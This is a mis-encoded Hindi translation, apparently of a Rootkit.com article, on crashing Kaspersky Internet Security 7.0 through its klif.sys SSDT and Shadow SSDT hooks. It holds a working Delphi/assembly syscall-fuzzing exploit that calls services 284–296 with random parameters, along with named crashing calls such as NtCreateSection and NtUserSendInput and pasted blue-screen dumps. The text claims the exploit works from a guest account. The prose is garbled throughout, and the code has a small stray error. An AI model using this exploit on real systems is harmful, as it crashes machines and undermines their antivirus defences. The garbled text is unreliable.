Rootkit.com рдХреЗ рдПрдХ рд▓реЗрдЦ рдХрд╛ рдЕрдиреБрд╡рд╛рджрдкреНрд░рд╕реНрддрд╛рд╡рдирд╛Kaspersky рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдЖрдЬ рддрдХрдиреАрдХреА рд░реВрдк рд╕реЗ рд╕рдмрд╕реЗ рдЙрдиреНрдирдд рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдореЗрдВ рд╕реЗ рдПрдХ рд╣реИред рдпрд╣ рдХреБрдЫ рдкреНрд░рдХрд╛рд░ рдХреЗ
рд░реВрдЯрдХрд┐рдЯреЛрдВ рд╕реЗ рднреА рд▓рдбрд╝ рд╕рдХрддрд╛
рд╣реИ , рдЬрдм рд╡реЗ рдЬреАрд╡рд┐рдд рд╣реИрдВ рдФрд░ рд╣рдорд▓рд╛ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд░рд╣реЗ рд╣реИрдВред
рдЗрд╕рдореЗрдВ рдПрдХ рдкреНрд░реЛрдПрдХреНрдЯрд┐рд╡ рдбрд┐рдлреЗрдВрд╕ рдореЙрдбреНрдпреВрд▓ рд╣реИ, рдЬреЛ рдПрдХ рдЖрдВрд╢рд┐рдХ
рдПрдЪрдЖрдИрдкреАрдПрд╕ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рд╣реИ рдЬреЛ рд╕рд┐рджреНрдзрд╛рдВрдд рд░реВрдк рдореЗрдВ, рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рдХреЗ рд╡реНрдпрд╡рд╣рд╛рд░ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рдХреЗ рдФрд░ рдЕрдирдзрд┐рдХреГрдд рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рд░реЛрдХрдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдЬреНрдЮрд╛рдд рдЦрддрд░реЛрдВ рд╕реЗ рдХрдВрдкреНрдпреВрдЯрд░ рдХреА рд░рдХреНрд╖рд╛ рдХрд░ рд╕рдХрддрд╛ рд╣реИред
рдпрд╣ рд╕рднреА рд╕рд┐рджреНрдзрд╛рдВрдд рдФрд░ рд╡рд┐рдЬреНрдЮрд╛рдкрди рдирд╛рд░реЗ рд╣реИрдВред рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЕрд▓рдЧ рд╕реНрдерд┐рддрд┐ рд╣реИред рдХрдИ рд░реВрдЯрдХрд┐рдЯреНрд╕ рд╣реИрдВ рдЬреЛ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рджреНрд╡рд╛рд░рд╛ рдмрд┐рд▓реНрдХреБрд▓ рднреА рдирд╣реАрдВ рдкрд╣рдЪрд╛рдиреЗ рдЬрд╛рддреЗ рд╣реИрдВ, рдФрд░ рдЗрд╕рдХреА рд╕рдХреНрд░рд┐рдп рд░рдХреНрд╖рд╛ рдХреЛ рдЗрд╕ рддрд░рд╣ рд╕реЗ рджрдмрд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рд╣рдорд▓рд╛рд╡рд░ рдЕрдкрдиреЗ рдЪрд╛рд▓рдХ рдХреЛ рд▓реЛрдб рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рдХреЗ рдмрд╛рдж рдХреЛрдИ рднреА рдкреНрд░реЛрдПрдХреНрдЯрд┐рд╡ рд░рдХреНрд╖рд╛ рдмрд╕ рдмреЗрдХрд╛рд░ рд╣реИред
рдпрд╣ рдЖрд▓реЗрдЦ рдХреЗрд╡рд▓ рддреНрд░реБрдЯрд┐рдпреЛрдВ рдФрд░ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдЕрд╡рд▓реЛрдХрди рдирд╣реАрдВ рд╣реИ - рдкреНрд░рддреНрдпреЗрдХ рднрд╛рдЧ рдХреЗ рдЕрдВрдд рдореЗрдВ рд╣рдо рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдбреЗрд╡рд▓рдкрд░реНрд╕ рдХреЛ рд╕рд┐рдлрд╛рд░рд┐рд╢реЗрдВ рджреЗрддреЗ рд╣реИрдВ, рдХреНрдпреЛрдВрдХрд┐ рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рд╡реЗ рдЗрди рддреНрд░реБрдЯрд┐рдпреЛрдВ рд╕реЗ рдЕрдкрдиреЗ рдЖрдк рдирд┐рдкрдЯ рдирд╣реАрдВ рд╕рдХрддреЗ рд╣реИрдВред рдФрд░ рд╕рдорд░реНрдердХреЛрдВ рдХреЗ рд▓рд┐рдП, рддреБрд░рдВрдд рдПрдХ рдЖрд░рдХреНрд╖рдг рд╣реИ: рдирд┐рд╢реНрдЪрд┐рдд рд░реВрдк рд╕реЗ, рдЬреЛ рдХреБрдЫ рднреА рдиреАрдЪреЗ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИ, рд╡рд╣ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХрдордЬреЛрд░рд┐рдпрд╛рдВ рдирд╣реАрдВ рд╣реИ, рдирд╣реАрдВ, рдирд╣реАрдВ =)
рдмреАрдПрд╕рдУрдбреА рдХреЛ рдХреЗрдПрд╡реА / рдХреЗрдЖрдИрдПрд╕ рдХреЗ рд╕рд╛рде рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЗрд╡рд▓ рдХреБрдЫ рд╕рд░рд▓ рддрд░реАрдХреЗ рд╣реИрдВ, рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рдПрдХ рдЕрддрд┐рдерд┐ рдЦрд╛рддреЗ рд╕реЗ рднреА, рдмрд╕ рдХреЗрд╡реАрдП / рдХреЗрдЖрдИрдПрд╕ рд╡рд░реНрдХрдЕрд░рд╛рдЙрдВрдб ... рдФрд░ рдЗрддрдиреЗ рдкрд░, рд╕рд╛рдорд╛рдиреНрдп рд░реВрдк рд╕реЗ, рджрд┐рд▓ рдХреЛ рдмрд╣реБрдд рдЕрдзрд┐рдХ рди рд▓реЗрдВред
рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ рдЪрд░реНрдЪрд╛ рдХреА рдЬрд╛рдиреЗ рд╡рд╛рд▓реА Kaspersky рдХрд╛ рд╕рдВрд╕реНрдХрд░рдг 7.0 рд╣реИ, рдЕрдВрддрд┐рдо рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдирд┐рд░реНрдорд╛рдг 125 рд╣реИ, рдФрд░ рдЙрддреНрдкрд╛рдж рдкреНрд░рдХрд╛рд░ рдЗрдВрдЯрд░рдиреЗрдЯ рд╕реБрд░рдХреНрд╖рд╛ рд╣реИред
Kaspersky рдФрд░ рд╕рд┐рд╕реНрдЯрдо рд╕рд░реНрд╡рд┐рд╕ рдбрд┐рд╕реНрдХреНрд░рд┐рдкреНрдЯрд┐рд╡ рдЯреЗрдмрд▓рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХреЗ рдЗрд╕ рд╣рд┐рд╕реНрд╕реЗ рдХреЛ рд▓рдВрдмреЗ рд╕рдордп рд╕реЗ рд╕рдмрд╕реЗ рдХрдордЬреЛрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдЬрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рдРрд╕рд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕рдореЗрдВ рдХрдИ рдкреНрд░рд╛рдердорд┐рдХ рддреНрд░реБрдЯрд┐рдпрд╛рдВ рд╣реИрдВред рдпреЗ рддреНрд░реБрдЯрд┐рдпрд╛рдВ рдПрдХ рдЦрд░рд╛рдм рд▓рд┐рдЦрд┐рдд рд╕рдХреНрд░рд┐рдп рд░рдХреНрд╖рд╛ рдХрд╛ рдПрдХ рдФрд░ рдЙрджрд╛рд╣рд░рдг рд╣реИрдВред
Windows XP рдХреЗ рддрд╣рдд, Kaspersky рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ SSDT рдЯреЗрдмрд▓ рдореЗрдВ рд╕реЗрд╡рд╛рдПрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реИред рдХрдИ рд╕реЗрд╡рд╛рдПрдБ рдЬреЛ рдХреЗрд╡рд▓ Windows 2003 рдХреЗ рдЕрдВрддрд░реНрдЧрдд рдореМрдЬреВрдж рд╣реИрдВред рдЙрдирдХреА рд╕рдВрдЦреНрдпрд╛ 284 рд╕реЗ 296 рддрдХ рд╣реИред рд▓рдЧрднрдЧ 13 рдЕрдЬреНрдЮрд╛рдд рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпрд╛рдБ klif.sys рдХреЗ рдкрддреЗ рдХреЗ рд╕рд╛рде рд╣реИрдВред
рдпрд╣рд╛рдБ рд╡реЗ рд╣реИрдВ:
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BD80 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BD90 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BDA0 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BDC0 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BDE0 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BE10 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BE20 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BE40 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BE50 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BF10 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809BFE0 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд 0xF809C020 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809C060 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░ [C: \ WINDOWS \ system32 \ driver \ klif.sys] рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИ
рдпрд╣ рдХреНрдпрд╛ рд╣реИ рдпрд╣ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рд╕рдордЭ рд╕реЗ рдмрд╛рд╣рд░ рд╣реИред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ KAV рдбреЗрд╡рд▓рдкрд░реНрд╕ рдЙрдиреНрд╣реЗрдВ Windows XP рдФрд░ 2003 рдХреЗ рддрд╣рдд SSDT рддрд╛рд▓рд┐рдХрд╛ рдореЗрдВ рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпреЛрдВ рдХреА рдПрдХ рдЕрд▓рдЧ рд╕рдВрдЦреНрдпрд╛ рдХреЗ рд╕рд╛рде рд╕рдорд╕реНрдпрд╛ рдХреЛ рд╣рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЬреЛрдбрд╝ рд░рд╣реЗ рд╣реИрдВред рдРрд╕рд╛ рдХреНрдпреЛрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдпрд╣ рддреАрд╕рд░рд╛ рдкреНрд░рд╢реНрди рд╣реИред
рдФрд░ рдЕрдм рдзреНрдпрд╛рди рджреЗрдВ: рдЗрдирдореЗрдВ рд╕реЗ рдХрд┐рд╕реА рднреА рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐ рдХреЛ рд╣реИрдХ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЗрд╕рдХреЗ рдмрд╛рдж рдмреАрдПрд╕рдУрдбреА рдореЗрдВ рдПрдХ рд╕рд┐рд╕реНрдЯрдо рдХреНрд░реИрд╢ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐
рдиреНрдпреВрдирддрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡рд╛рд▓реЗ рдЕрддрд┐рдерд┐ рдЦрд╛рддреЗ рдХреЗ рддрд╣рдд рднреАред рд╣рдордиреЗ рдПрдХ рдЫреЛрдЯрд╛ рд╕рд╛ рдХрд╛рд░реНрдпрдХреНрд░рдо рд▓рд┐рдЦрд╛ред рдпрд╣ SSDT рдореЗрдВ рдЗрди рд░рд╣рд╕реНрдпрдордп рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рдЧрд▓рдд рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рд╕рд╛рде рдЧрд▓рдд рд╕рд┐рд╕реНрдЯрдо рдХреЙрд▓ рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИред рдХреЛрдб рдмрд╣реБрдд рд╕рд░рд▓ рд▓реЗрдХрд┐рди рдкреНрд░рднрд╛рд╡реА рд╣реИред рдЗрд╕реЗ рд╢реБрджреНрдз рд╡рд┐рдВрдбреЛрдЬ рдкрд░ рдЪрд▓рд╛рдиреЗ рд╕реЗ рдХреБрдЫ рднреА рдирд╣реАрдВ рд╣реЛрдЧрд╛, рдХреНрдпреЛрдВрдХрд┐ рд╡рд┐рдВрдбреЛрдЬ рд╕реНрд╡рдпрдВ рдРрд╕реА рд╕реНрдерд┐рддрд┐рдпреЛрдВ рдХреЛ рд╕рд╣реА рдврдВрдЧ рд╕реЗ рд╕рдВрднрд╛рд▓рддрд╛ рд╣реИред
var
Services: array[0..12] of ULONG;
ThreadTerminated: boolean = false;
ExecThread: THANDLE;
function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
asm
mov eax, SysCallNumber
mov edx, Stack
int 2eh
mov Result,eax
end;
function exec(p1: pointer): DWORD; stdcall;
var
i: integer;
p2: DWORD;
p3: DWORD;
begin
randomize();
u := 0;
for i := 0 to 12 do Services[i] := 284 + i;
while not ThreadTerminated do
begin
p2 := random($FFFFFFFF);
p3 := Services[random(12)];
MakeSysCall(p3, @p2);
Sleep(100);
end;
CloseHandle(ExecThread);
ExecThread := 0;
result := 0;
end;
var
p2: DWORD;
begin
ThreadTerminated := false;
ExecThread := CreateThread(nil, 0, @exec, nil, 0, p2);
end;
рдирд┐рд╖реНрдкрд╛рджрди рдкрд░рд┐рдгрд╛рдо: Kaspersky Internet Security v7.0 125 рдмрд┐рд▓реНрдб
PAGE_FAULT_IN_NONPAGED_AREA (50)
рдЕрдорд╛рдиреНрдп рд╕рд┐рд╕реНрдЯрдо рдореЗрдореЛрд░реА рдХреЛ рд╕рдВрджрд░реНрднрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рдЗрд╕реЗ рдкреНрд░рдпрд╛рд╕ рдХреЛ рдЫреЛрдбрд╝рдХрд░ рд╕рдВрд░рдХреНрд╖рд┐рдд рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ,
рдпрд╣ рдПрдХ рдЬрд╛рдВрдЪ рджреНрд╡рд╛рд░рд╛ рд╕рдВрд░рдХреНрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдПред рдЖрдорддреМрд░ рдкрд░ рдкрддрд╛ рд╕рд┐рд░реНрдл рд╕рд╛рджрд╛ рдЦрд░рд╛рдм рд╣реЛрддрд╛ рд╣реИ рдпрд╛ рдпрд╣
рдореБрдХреНрдд рд╕реНрдореГрддрд┐ рдХреА рдУрд░ рдЗрд╢рд╛рд░рд╛ рдХрд░ рд░рд╣рд╛ рд╣реИред
рддрд░реНрдХ:
Arg1: e0ae15f9, рдореЗрдореЛрд░реА рд╕рдВрджрд░реНрднрд┐рддред
Arg2: 00000000, рдорд╛рди 0 = рд░реАрдб рдСрдкрд░реЗрд╢рди, 1 = рд░рд╛рдЗрдЯ рдСрдкрд░реЗрд╢рдиред
Arg3: f8087e8c, рдпрджрд┐ рдЧреИрд░-рд╢реВрдиреНрдп, рдЕрдиреБрджреЗрд╢ рдкрддрд╛ рдЬреЛ рдЦрд░рд╛рдм рдореЗрдореЛрд░реА рдХреЛ рд╕рдВрджрд░реНрднрд┐рдд рдХрд░рддрд╛ рд╣реИ
рдкрддрд╛ред
Arg4: 00000000, (рдЖрд░рдХреНрд╖рд┐рдд)
рд╕рднреА bsod рдкрд╛рда ...
рд▓реЗрдХрд┐рди рдпрд╣ рд╕рдм рдирд╣реАрдВ рд╣реИ!
SSDT рдореЗрдВ рдореМрдЬреВрджрд╛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреА рд░рд┐рдкреЛрд░реНрдЯ рдХреЗ рдмрд╛рд╡рдЬреВрдж, Kaspersky Developers
рдиреЗ рдЕрднреА рддрдХ рдЙрдиреНрд╣реЗрдВ рддрдп рдирд╣реАрдВ рдХрд┐рдпрд╛ рд╣реИ!
рд╣рдо рдЗрд╕реЗ NTCALL рдирд╛рдордХ рдПрдХ рд╕рд╛рдзрд╛рд░рдг рдХрд╛рд░реНрдпрдХреНрд░рдо рдХреЗ рд╕рд╛рде рд╕рд╛рдмрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рдпрд╣ рдЧрд▓рдд рд╕рд┐рд╕реНрдЯрдо рдХреЙрд▓ рдЙрддреНрдкрдиреНрди рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░ рджреЗрддрд╛ рд╣реИред
NtCreateSection - рдЗрд╕ рдлрд╝рдВрдХреНрд╢рди рдХреЛ рдЕрдорд╛рдиреНрдп рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рд╕рд╛рде рдХреЙрд▓ рдХрд░рдиреЗ рд╕реЗ klif.sys рдореЗрдВ BSOD рд╣реЛ рдЬрд╛рдПрдЧрд╛ред
рдпрд╣рд╛рдБ рдпрд╣ рд╣рдорд╛рд░рд╛ BSOD рд╣реИ:
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
рдпрд╣ рдПрдХ рдмрд╣реБрдд рд╣реА рд╕рд╛рдорд╛рдиреНрдп рдмрдЧрдЪреЗрдХ рд╣реИред рдЖрдорддреМрд░ рдкрд░ рдЕрдкрд╡рд╛рдж рдкрддрд╛ рдкрд┐рдирдкреЙрдЗрдВрдЯреНрд╕
рдбреНрд░рд╛рдЗрд╡рд░ / рдлрд╝рдВрдХреНрд╢рди рдЬреЛ рд╕рдорд╕реНрдпрд╛ рдХрд╛ рдХрд╛рд░рдг рдмрдирд╛ред рдЗрд╕ рдкрддреЗ рдкрд░ рд╣рдореЗрд╢рд╛ рдзреНрдпрд╛рди рджреЗрдВ
рд╕рд╛рде рд╣реА рдбреНрд░рд╛рдЗрд╡рд░ / рдЫрд╡рд┐ рдХреА рд▓рд┐рдВрдХ рддрд┐рдерд┐ рдЬрд┐рд╕рдореЗрдВ рдпрд╣ рдкрддрд╛ рд╣реИред
рдХреБрдЫ рд╕рд╛рдорд╛рдиреНрдп рд╕рдорд╕реНрдпрд╛рдПрдВ рдЕрдкрд╡рд╛рдж рдХреЛрдб 0x80000003 рд╣реИрдВред рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдПрдХ рдХрдард┐рди
рдХреЛрдбрд┐рдд рдмреНрд░реЗрдХрдкреЙрдЗрдВрдЯ рдпрд╛ рдЕрднрд┐рдХрдерди рд╣рд┐рдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рд▓реЗрдХрд┐рди рдпрд╣ рд╕рд┐рд╕реНрдЯрдо рдмреВрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛
/ NODEBUG рдпрд╣ рдРрд╕рд╛ рдирд╣реАрдВ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рдЬреИрд╕рд╛ рдХрд┐ рдбреЗрд╡рд▓рдкрд░реНрд╕ рдХреЗ рдкрд╛рд╕ рдХрднреА рдирд╣реАрдВ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП
рдЦреБрджрд░рд╛ рдХреЛрдб рдореЗрдВ рд╣рд╛рд░реНрдбрдХреЛрдб рдЯреВрдЯ рдЧрдпрд╛ рд╣реИ, рд▓реЗрдХрд┐рди ...
рдпрджрд┐ рдРрд╕рд╛ рд╣реЛрддрд╛ рд╣реИ, рддреЛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВ рдХрд┐ рдПрдХ рдбрд┐рдмрдЧрд░ рдЬреБрдбрд╝рд╛ рд╣реБрдЖ рд╣реИ, рдФрд░
рд╕рд┐рд╕реНрдЯрдо рдмреВрдЯ / DEBUG рд╣реИред рдпрд╣ рд╣рдореЗрдВ рджреЗрдЦрдиреЗ рджреЗрдЧрд╛ рдХрд┐ рдпрд╣ рд╡рд┐рд░рд╛рдо рдмрд┐рдВрджреБ рдХреНрдпреЛрдВ рд╣реИ
рд╣реЛ рд░рд╣рд╛ред
рддрд░реНрдХ:
Arg1: c0000005, рдЕрдкрд╡рд╛рдж рдХреЛрдб рдЬреЛ рд╕рдВрднрд╛рд▓рд╛ рдирд╣реАрдВ рдЧрдпрд╛ рдерд╛
Arg2: 805883ea, рдЕрдкрд╡рд╛рдж рдЬреЛ рд╣реБрдЖ рдЙрд╕ рдкрддреЗ рдкрд░
Arg3: f669a95c, рдЯреНрд░реИрдк рдлреНрд░реЗрдо
Arg4: 00000000
рдбрд┐рдмрдЧрд┐рдВрдЧ рд╡рд┐рд╡рд░рдг:
- рд╡рд┐рд╢реНрд▓реЗрд╖рдг: рдЕрдЬреНрдЮрд╛рдд рдЖрдХрд╛рд░ рдХреЗ рд╕рд╛рде рдХрд░реНрдиреЗрд▓ред рдЬреНрдЮрд╛рдд рдЖрдХрд╛рд░ рдХреЗ рд╕рд╛рде рдкреНрд░рддреАрдХреЛрдВ рдХреЛ рдкреБрдирдГ рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрд╛рдзреНрдп рдХрд░реЗрдЧрд╛ред
рд╡рд┐рд╢реНрд▓реЗрд╖рдг: рдмрд▓ рдкреБрдирдГ рд▓реЛрдб рдХрдорд╛рди: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** рдХрд░реНрдиреЗрд▓ рдкреНрд░рддреАрдХ рдЧрд▓рдд рд╣реИрдВред рдХреГрдкрдпрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рддреАрдХреЛрдВ рдХреЛ рдареАрдХ рдХрд░реЗрдВред
MODULE_NAME: klif
рд╕рднреА bsod рдкрд╛рда ...
рдореИрдВ рдХреНрдпрд╛ рдХрд╣ рд╕рдХрддрд╛ рд╣реВрдВ? .. рдпрд╣ рд╕рдордп рдПрд╕рдПрд╕рдбреАрдЯреА рдХреЗ рд╕рд╛рде рд░реБрдХрдиреЗ рдФрд░ рдПрд╕рдПрд╕рдбреАрдЯреА рд░рд┐рдХреЙрд░реНрдб рдХреЗ рд▓рд┐рдП рд╕рд╛рдорд╛рдиреНрдп рд╣реИрдВрдбрд▓рд░ рд▓рд┐рдЦрдиреЗ рдХрд╛ рд╣реИред рдмреЗрд╣рддрд░ рд▓реЗрдВ рдФрд░
рдУрд▓реЗрдЧ рдЬрд╝реИрддрд╕реЗрд╡ рд╕реЗ рдкреВрдЫреЗрдВ рдХрд┐ рдПрд╕рдПрд╕рдбреАрдЯреА рдореЗрдВ рд╣реБрдХ рдХреИрд╕реЗ рд╕реЗрдЯ рдХрд░реЗрдВ?)
рдХрд╛рд╕реНрдкрд░рд╕реНрдХреА рдФрд░ рд╢реИрдбреЛ рдПрд╕рдПрд╕рдбреАрдЯреА (рд╢реИрдбреЛ рдПрд╕рдПрд╕рдбреАрдЯреА)рдЫрд╛рдпрд╛ SSDT win32k.sys рдореЗрдВ рдПрдХ рд╡рд┐рд╢реЗрд╖ рддрд╛рд▓рд┐рдХрд╛ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЧреНрд░рд╛рдлрд┐рдХ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ (GDI) рдХреЗ рдкреНрд░рджрд░реНрд╢рди рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╕рд┐рд╕реНрдЯрдо рдлрд╝рдВрдХреНрд╢рди рдХреЗ рдкрддреЗ рд╢рд╛рдорд┐рд▓ рд╣реИрдВред рдХреИрд╕рдкрд░реНрд╕рдХреА рдиреЗ рдХреБрдЫ рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдпрд╣рд╛рдВ рдХреАрд▓реЛрдЧрд░реНрд╕ рдХреЛ рд░реЛрдХрдиреЗ рдФрд░ рдЖрддреНрдорд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рд╣реБрдХ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдП рд╣реИрдВред
рдФрд░ рдлрд┐рд░, рд╣реБрдХ
рдЦрд░рд╛рдм рддрд░реАрдХреЗ рд╕реЗ рд╕реЗрдЯ рдХрд┐рдП рдЧрдП рд╣реИрдВред
рдЧрд▓рдд рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рд╕рд╛рде NtUserSendInput рдФрд░ ... -> haha, рдирдпрд╛ BSOD, рдХреНрдпрд╛ рдпрд╣ рдЖрдкрдХреЛ рдХреБрдЫ BSOD рдЬрдирд░реЗрдЯрд░ рдХреА рдпрд╛рдж рдирд╣реАрдВ рджрд┐рд▓рд╛рддрд╛ рд╣реИ? =)
PAGE_FAULT_IN_NONPAGED_AREA (50)
рдЕрдорд╛рдиреНрдп рд╕рд┐рд╕реНрдЯрдо рдореЗрдореЛрд░реА рдХреЛ рд╕рдВрджрд░реНрднрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рдЗрд╕реЗ рдкреНрд░рдпрд╛рд╕ рдХреЛ рдЫреЛрдбрд╝рдХрд░ рд╕рдВрд░рдХреНрд╖рд┐рдд рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ,
рдпрд╣ рдПрдХ рдЬрд╛рдВрдЪ рджреНрд╡рд╛рд░рд╛ рд╕рдВрд░рдХреНрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдПред рдЖрдорддреМрд░ рдкрд░ рдкрддрд╛ рд╕рд┐рд░реНрдл рд╕рд╛рджрд╛ рдЦрд░рд╛рдм рд╣реЛрддрд╛ рд╣реИ рдпрд╛ рдпрд╣
рдореБрдХреНрдд рд╕реНрдореГрддрд┐ рдХреА рдУрд░ рдЗрд╢рд╛рд░рд╛ рдХрд░ рд░рд╣рд╛ рд╣реИред
рддрд░реНрдХ:
Arg1: e1f83004, рдореЗрдореЛрд░реА рд╕рдВрджрд░реНрднрд┐рддред
Arg2: 00000000, рдорд╛рди 0 = рд░реАрдб рдСрдкрд░реЗрд╢рди, 1 = рд░рд╛рдЗрдЯ рдСрдкрд░реЗрд╢рдиред
